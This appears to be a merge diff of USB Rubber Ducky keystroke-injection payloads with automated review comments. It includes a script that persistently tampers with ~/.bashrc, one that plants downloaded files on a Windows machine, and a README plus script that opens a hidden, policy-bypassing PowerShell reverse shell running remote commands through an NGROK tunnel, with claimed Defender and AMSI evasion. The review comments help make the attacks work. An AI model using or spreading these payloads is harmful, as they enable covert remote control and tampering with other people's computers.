Merge branch 'hak5:master' into master
|
@ -80,7 +80,7 @@ STRING $SMTPInfo.Send($ReportEmail)
|
|||
ENTER
|
||||
REM Delete Log.txt and exit
|
||||
DELAY 3000
|
||||
STRING del Log.txt
|
||||
STRINGLN del Log.txt
|
||||
DELAY 500
|
||||
STRING exit
|
||||
STRINGLN exit
|
||||
ENTER
|
||||
|
|
|
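Review bot: The closing `ENTER` is now redundant: `STRINGLN exit` already sends the newline that closes the console, so the trailing ENTER is delivered after that window is gone and lands in whatever window regains focus. Either drop the `ENTER` or keep `STRING exit` on that line so the explicit ENTER stays meaningful. The switch to `STRINGLN del Log.txt` itself looks right, since the old version had no newline between `del Log.txt` and `exit` and would have typed them as one command. The payload continues outside the hunk on both sides.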
@ -0,0 +1,68 @@
|
|||
REM TITLE: Deshellerator
|
||||
REM AUTHOR: Korben, Darren
|
||||
REM VERSION: 1.0
|
||||
|
||||
REM DESCRIPTION: "Slow down there buckaroo" - Shell Decelerator
|
||||
REM Every time a shell is opened (that sources ~/.bashrc), opening the next
|
||||
REM shell will get ever so slightly slower...
|
||||
|
||||
REM TARGETS: Linux - tested on ubuntu
|
||||
REM REQUIREMENTS: DuckyScript 3, PayloadStudio >1.3
|
||||
|
||||
DEFINE #TARGET_FILE ~/.bashrc
|
||||
DEFINE #DECELERATION_RATE 0.5
|
||||
|
||||
REM Delay used for waiting for GUI elements to spawn/react
|
||||
REM Increase to make more compatible with all systems
|
||||
DEFINE #UI_DELAY 250
|
||||
|
||||
LED_OFF
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.0
|
||||
|
||||
REM Windows fully passive OS Detection and passive Detect Ready
|
||||
REM Includes its own passive detect ready. Does not require
|
||||
REM additional extensions
|
||||
|
||||
REM USAGE:
|
||||
REM Extension runs inline (here)
|
||||
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
REM boot delay
|
||||
REM $_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE MAX_WAIT 150
|
||||
DEFINE CHECK_INTERVAL 20
|
||||
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE NOT_WINDOWS 7
|
||||
|
||||
VAR $MAX_TRIES = MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
ELSE
|
||||
$_OS = NOT_WINDOWS
|
||||
END_IF
|
||||
|
||||
REM EXAMPLE USAGE AFTER EXTENSION
|
||||
REM IF ($_OS == WINDOWS) THEN
|
||||
REM STRING HELLO WINDOWS!
|
||||
REM ELSE
|
||||
REM STRING HELLO WORLD!
|
||||
REM END_IF
|
||||
END_EXTENSION
|
||||
|
||||
REM Inapplicable target guard clause
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
ATTACKMODE OFF
|
||||
LED_R
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
|
||||
CTRL ALT t
|
||||
DELAY #UI_DELAY
|
||||
STRINGLN echo "echo 'sleep #DECELERATION_RATE'>>#TARGET_FILE">>#TARGET_FILE;exit
|
||||
LED_G
|
|
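Review bot: The guard `IF ($_OS == WINDOWS) THEN` only stops the payload on Windows, but the inline `PASSIVE_WINDOWS_DETECT` extension sets `$_OS` to either `WINDOWS` or `NOT_WINDOWS`, so a non-Windows host that is not Linux passes the guard and the final `STRINGLN` is typed into whatever window has focus, because `CTRL ALT t` need not open a terminal there. The header line `REM TARGETS: Linux - tested on ubuntu` should say this explicitly, e.g. `REM NOTE: the guard only rules out Windows; other non-Linux hosts are not detected and will receive the keystrokes`. Since every sourced shell appends another `sleep` line to `#TARGET_FILE` and nothing ever removes them, the header should also document that the effect persists across sessions and is undone by deleting the appended `sleep #DECELERATION_RATE` lines from `#TARGET_FILE`.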
@ -0,0 +1,42 @@
|
|||
REM PUBLIC-SERVICE-ANNOUCEMENT
|
||||
REM (or (EAS)ter-eggs)
|
||||
REM By Lumen
|
||||
REM Warns the user of the danger of ducks!
|
||||
DEFINE EGG1 example.com/egg1.png
|
||||
DEFINE EGG2 example.com/egg2.png
|
||||
DEFINE EGG3 example.com/egg3.png
|
||||
DEFINE EGG4 example.com/egg5.png
|
||||
DEFINE TEXTFILE example.com/a_friendly_psa.txt
|
||||
REM See below for how to configure these URLs
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRING powershell
|
||||
DELAY 300
|
||||
ENTER
|
||||
DELAY 600
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING TEXTFILE
|
||||
STRING " -OutFile "~\Desktop\a_friendly_psa.txt"; Invoke-WebRequest -Uri "
|
||||
STRING EGG1
|
||||
STRING " -OutFile "~\Documents\egg1.png"; Invoke-WebRequest -Uri "
|
||||
STRING EGG2
|
||||
STRING " -OutFile "~\Pictures\egg2.png"; Invoke-WebRequest -Uri "
|
||||
STRING EGG3
|
||||
STRING " -OutFile "~\Documents\My Games\egg3.png"; Invoke-WebRequest -Uri "
|
||||
STRING EGG4
|
||||
STRING " -OutFile "~\Downloads\egg5.png"; & ~\Desktop\a_friendly_psa.txt
|
||||
ENTER
|
||||
REM This script makes heavy use of the Invoke-WebRequest command, which
|
||||
REM gathers a webpage and optionally saves it
|
||||
REM Here, we use it to give the user a nice warning about security :D
|
||||
REM This script hides 4 eggs, gives a little warning, and may
|
||||
REM or may not send them on a quest for a mythical 5th egg ¯\_(ツ)_/¯
|
||||
REM These statements can be removed to save on space, and the links above
|
||||
REM can be changed to short links to save on typing time
|
||||
|
||||
REM To set up the URLs for deployment, use a file share service to host
|
||||
REM the 4 images and text files that come with this payload.
|
||||
REM Any file share can be used as long as it offers a link
|
||||
REM directly to the file that can be saved or downloaded
|
||||
REM (for example, a dropbox link with ?dl=1 at the end)
|
|
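Review bot: The values in the `DEFINE EGG1` … `DEFINE TEXTFILE` lines carry no scheme and are pasted verbatim into `Invoke-WebRequest -Uri "…"`, which rejects a relative URI such as `example.com/egg1.png`; the comment `REM See below for how to configure these URLs` should state that the replacement links must be absolute, or the placeholders should carry the scheme, e.g. `DEFINE EGG1 https://example.com/egg1.png`. Separately, `-OutFile "~\Documents\My Games\egg3.png"` assumes that folder exists: `-OutFile` does not create missing directories, so where no game has created `My Games` that download fails and only the other eggs are written. The REM block at the end says four eggs are hidden while the bundled text file announces five, which reads as intentional given the "mythical 5th egg" remark, but a one-line REM next to `DEFINE EGG4 example.com/egg5.png` would stop a maintainer from "fixing" the filename.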
@ -0,0 +1,24 @@
|
|||
So you left your computer unlocked...
|
||||
|
||||
Not a good idea! It only takes a few seconds of access to your computer
|
||||
download, install, and execute code! For example, someone could use a tool
|
||||
called a USB Rubber Ducky (https://shop.hak5.org/products/usb-rubber-ducky)
|
||||
to quickly inject code into your PC... which somebody already did!
|
||||
|
||||
If you're seeing this, it means someone plugged a device into your computer
|
||||
and used a piece of code called PUBLIC_SERVICE_ANNOUNCEMENT
|
||||
(https://github.com/Lumen-git/RubberDucky-PublicServiceAnnouncement)
|
||||
to warn you of the dangers of leaving your computer unlocked in a public space! Now, 5
|
||||
images of Easter Eggs have been downloaded to your computer. I'll give you a hint,
|
||||
the first is in "My Documents".
|
||||
|
||||
Just think if someone downloaded a crypto miner! Or uploaded all your files
|
||||
to the internet! Stay safe, and protect your PC!
|
||||
|
||||
|
||||
Computer Safety Tips (see #6!!): https://security.berkeley.edu/resources/best-practices-how-to-articles/top-10-secure-computing-tips
|
||||
Other USB attacks that could have happened: https://www.bleepingcomputer.com/news/security/heres-a-list-of-29-different-types-of-usb-attacks/
|
||||
|
||||
|
||||
Although the code was written my Lumen, they do not suggest its use on targets
|
||||
without permission, nor do they hold any responsibility for its use.
|
|
@ -0,0 +1,48 @@
|
|||
**Title: Hoaxshell via Villain Payload and NGROK Tunnel**
|
||||
|
||||
<p>Author: HackingMark<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
Requirements: DuckyScript 3.0, powershell, Linux Maschine with Villain, NGROK</p>
|
||||
|
||||
**What is Villain?**
|
||||
#
|
||||
*Villain is a Toolset to setup Payloads and Listener for Hoaxshell*
|
||||
*Hoaxshell is actually undetected by Windows Defender and the Payload is optimized to bypass AMSITrigger*
|
||||
*The Powershell Payload connects the target Machine back to the Hoaxshell Server, NGROK makes this Server reachable from the Internet. *
|
||||
*That way you can catch your session from everywhere. Once your session is established, you can open an interactive shell.*
|
||||
|
||||
|
||||
|
||||
**How to use this Payload**
|
||||
|
||||
First clone Villain from Repo:
|
||||
`git clone https://github.com/t3l3machus/Villain`
|
||||
Then install Requirements:
|
||||
`cd Villain`
|
||||
`pip install -r ./requirements.txt`
|
||||
Allow Villain to start:
|
||||
`chmod +x ./Villain.py`
|
||||
Fire it up:
|
||||
`./Villain.py`
|
||||
Generate a payload to get the session identifier:
|
||||
`generate os=windows lhost=0.0.0.0 lport=8080`
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/villain.png)
|
||||
|
||||
Establish NGROK Tunnel forwarding Traffic to our Hoaxshell Engine
|
||||
`ngrok http 8080`
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok1.png)
|
||||
Leave this Window open
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok2.png)
|
||||
|
||||
**Preparing the Payload:**
|
||||
You need 2 Values from above: NGROK HTTPS Link and Session Identifier from Villain
|
||||
Put it into the Payload then compile it to inject.bin and download.
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/payloadstudio.png)
|
||||
|
||||
Copy your Inject.bin to your Ducky!
|
||||
|
||||
<p>Plug your Ducky into a Windows target.<br>
|
||||
Achieve reverse shell.<br>
|
||||
open a shell with </p>
|
||||
`shell SESSION-ID`
|
|
@ -0,0 +1,42 @@
|
|||
REM Villain Shell via NGROK
|
||||
REM HackingMark
|
||||
REM DESCRIPTION This Script spawns a Admin Powershellwindow and executes the Villain Payload throug an NGROK Tunnel in the Background(Win10)/minimized(Win11)
|
||||
|
||||
REM Villain Hoaxshell by T3l3machus on Github: https://github.com/t3l3machus/Villain
|
||||
REM What to do before: Start Villain.py on your System and create a Payload (generate os=windows lhost=0.0.0.0 lport=8080) to get the $i value
|
||||
REM take the generated Value from $i and paste it in line 11-13
|
||||
REM Start Ngrok Tunnel (ngrok http 8080)
|
||||
REM Put your NGROK HTTPS Link here
|
||||
DEFINE #NGROK Example.com
|
||||
REM Split your Sessionnumber into 3 parts eg $i='4ba4f358-322d5df5-f4516c91'
|
||||
DEFINE #SN1 4ba4f358
|
||||
DEFINE #SN2 322d5df5
|
||||
DEFINE #SN3 f4516c91
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI x
|
||||
DELAY 200
|
||||
STRING a
|
||||
DELAY 500
|
||||
ALT j
|
||||
REM The Part above needs to be adapted to your language, code is for German System Layouts
|
||||
DELAY 1000
|
||||
STRING powershell -w h -NoP -NonI -ep Bypass -C {$s='
|
||||
STRING #NGROK
|
||||
STRING ';$i='
|
||||
STRING #SN1
|
||||
STRING -
|
||||
STRING #SN2
|
||||
STRING -
|
||||
STRING #SN3
|
||||
STRING ';$p='h'+'ttps://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/
|
||||
STRING #SN1
|
||||
STRING /$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/
|
||||
STRING #SN2
|
||||
SPACE
|
||||
STRING -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/
|
||||
STRING #SN3
|
||||
SPACE
|
||||
STRING -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}}
|
||||
ENTER
|
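Review bot: The comment `REM take the generated Value from $i and paste it in line 11-13` points at the wrong lines: counting from the top of this file, the `DEFINE #SN1` … `#SN3` lines are 12–14, and the numbers drift as soon as anything is added above them. Naming the DEFINEs keeps the comment correct, e.g. `REM take the generated Value from $i and paste its three parts into #SN1, #SN2 and #SN3`.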